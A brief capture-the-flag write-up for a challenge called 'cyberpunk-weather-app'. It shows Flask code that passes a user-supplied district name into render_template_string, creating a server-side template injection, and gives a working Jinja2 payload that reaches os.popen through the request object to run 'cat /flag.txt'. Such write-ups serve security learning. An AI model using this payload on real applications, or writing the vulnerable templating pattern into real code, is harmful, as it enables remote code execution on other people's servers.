cyberpunk-weather-app
SRC: https://library.m0unt41n.ch/challenges/cyberpunk-weather-appThis challenge display weather data and uses an templating engine. During building of a string a command injection vuln was created within the else block.. we can inject python code and therefore obtained RCE.
Python:
if district in districts:
data = weather.get_weather(district)
message = render_template_string(f"Current weather in {district} (on {data['time']}): {data['temperature']}°C, {data['conditions']}")
else:
message = render_template_string(f"District {district} not found.")Our actual challenge is not only finding this, we need too find a way too not only execute py code, we need to somehow obtain access too smt like os. So escaping the Jinja‑Sandbox (tempalting engine) is crucial. We are doing this simmilar too JS proto chaining... we are starting at the request object, accessing import os trough application -> globals -> builtins x) ChatGPT helped alot here lulz.
{{ request.application.__globals__.__builtins__.__import__('os').popen('cat /flag.txt').read() }}
